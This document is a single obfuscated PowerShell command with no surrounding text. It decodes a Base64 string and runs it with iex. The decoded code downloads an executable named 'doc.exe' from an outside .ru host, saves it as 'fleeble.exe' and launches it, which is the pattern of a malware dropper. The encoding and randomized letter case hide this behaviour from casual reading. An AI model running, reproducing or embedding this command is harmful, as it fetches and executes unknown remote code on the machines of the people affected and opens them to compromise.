iex([sYStEm.tEXT.enCoDInG]::uTf8.gETStRinG([SysTem.cOnvErt]::FRomBAsE64strinG('CihOZXctT2JqZWN0IHNZc3RlTS5uZXQud0ViQ2xJRU5UKS5kb3duTE9BZGZJbEUoJ2h0dHA6Ly9hbmRlcnNvbmtlbjQ3OTEucHNlcnZlci5ydS9kb2MuZXhlJywnZmxlZWJsZS5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYmxlLmV4ZScKCg==')));exit

